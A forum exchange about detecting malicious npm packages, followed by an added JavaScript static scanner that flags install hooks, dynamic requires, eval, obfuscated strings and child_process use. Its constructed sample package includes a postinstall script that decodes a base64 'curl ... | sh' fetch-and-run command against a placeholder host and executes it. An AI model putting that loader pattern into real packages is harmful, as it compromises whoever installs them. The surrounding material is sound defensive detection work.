
What prevents a malicious person from crafting their code until it evades your analysis? It's the same with antiviruses. They're not that useful because adversaries adapt their viruses to pass antivirus heuristics. And, as viruses show, however complex you make your heuristics, someone smart will find a way around them. Especially in that wild JavaScript environment.


This is a fair question. The answer is that most malware behaves in ways that are deterministically detectable. For example, 93% of malware uses install scripts, which must be declared in the package.json file and are not possible to hide from our analysis.

From recent research:

> We found 93.9% (3,412) of malicious packages had at least one install scripts, indicating that malicious attackers use install scripts frequently [1]

When malware authors adapt and start doing fancy dynamic stuff, we might not be able to figure out exactly what they're doing, but we can detect the usage of obfuscated code, dynamic requires, and other signals of compromise.

[1]: https://arxiv.org/pdf/2112.10165.pdf
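The signals the reply lists (install hooks declared in package.json, dynamic requires, obfuscated or decoded-at-runtime code) can be checked statically in a few dozen lines. The following is an added example written for this page; it is not the commenter's tool and not code from either comment. The signal names, the hit thresholds, the risk ranking and the sample package are all constructed for illustration. It takes a package as an in-memory map of file paths to contents, so it runs offline without touching the npm registry.

```javascript
// Added example: static checks for the signals named in the comment above.
// Not Socket's code or the paper's; thresholds and names are assumptions.

// npm lifecycle hooks that run automatically during `npm install`. npm only
// runs hooks it finds in package.json, so these cannot be hidden from a scan.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Returns the install hooks a package.json declares, with their commands.
function findInstallScripts(manifestText) {
  const manifest = JSON.parse(manifestText);
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string' && scripts[hook].trim())
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Source-level heuristics: [name, pattern, minimum hits to report].
// The minimum-hit thresholds are illustrative assumptions, not tuned values.
const SOURCE_SIGNALS = [
  // require() whose argument is not a string literal, e.g. require(x) or
  // require(String.fromCharCode(...)); a static scanner cannot resolve it.
  ['dynamic-require', /\brequire\s*\(\s*(?!['"`])/g, 1],
  // Code assembled at runtime.
  ['eval-or-function-ctor', /\beval\s*\(|\bnew\s+Function\s*\(/g, 1],
  // Dense \xNN / \uNNNN escapes in string literals, typical of obfuscators.
  ['hex-escaped-strings', /\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}/g, 8],
  // Base64 payloads decoded at runtime into code or shell commands.
  ['base64-decode', /Buffer\.from\([^)]*,\s*['"]base64['"]\)|\batob\s*\(/g, 1],
  // Spawning shells from a library package.
  ['child-process', /require\s*\(\s*['"]child_process['"]\s*\)/g, 1],
];

// Returns the signals that fire on one JavaScript source file.
function scanSource(src) {
  const hits = [];
  for (const [name, pattern, min] of SOURCE_SIGNALS) {
    const count = (src.match(pattern) || []).length;
    if (count >= min) hits.push({ signal: name, count });
  }
  return hits;
}

// A bare install hook is only a weak signal (native builds use them too);
// an install hook that runs code carrying obfuscation or shell signals is
// the classic malicious shape. The three-level ranking is an assumption.
function riskLevel(report) {
  const signals = new Set(
    Object.values(report.sourceSignals).flat().map((h) => h.signal),
  );
  const hasHook = report.installScripts.length > 0;
  if (hasHook && signals.size > 0) return 'high';
  if (hasHook || signals.size > 0) return 'medium';
  return 'low';
}

// Scans a whole package. `files` maps relative paths to file contents.
function scanPackage(files) {
  const report = { installScripts: [], sourceSignals: {} };
  if (files['package.json']) {
    report.installScripts = findInstallScripts(files['package.json']);
  }
  for (const [path, content] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;
    const hits = scanSource(content);
    if (hits.length) report.sourceSignals[path] = hits;
  }
  report.risk = riskLevel(report);
  return report;
}

// Constructed sample package (not a real one) with the postinstall pattern.
// The base64 blob decodes to a placeholder command against example.invalid;
// nothing here is executed, the strings are only scanned.
const SAMPLE_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'example-widget',
    version: '1.0.0',
    scripts: { postinstall: 'node setup.js', test: 'mocha' },
  }),
  'setup.js': [
    "var cp = require('child_process');",
    'var m = require(String.fromCharCode(104, 116, 116, 112, 115));',
    "var cmd = Buffer.from('Y3VybCBodHRwczovL2V4YW1wbGUuaW52YWxpZC94IHwgc2g=', 'base64').toString();",
    'cp.exec(cmd);',
  ].join('\n'),
  'index.js': "module.exports = function widget() { return 'ok'; };",
};

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE), null, 2));
```

Running it on the constructed package reports the postinstall hook plus dynamic-require, base64-decode and child-process hits in setup.js, so the package ranks "high". A package with only a `postinstall: "node-gyp rebuild"` and clean sources ranks "medium", which is the caveat from the thread: install hooks are deterministic to find, but plenty of benign native packages declare them, so the hook alone is a reason to look, not a verdict.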



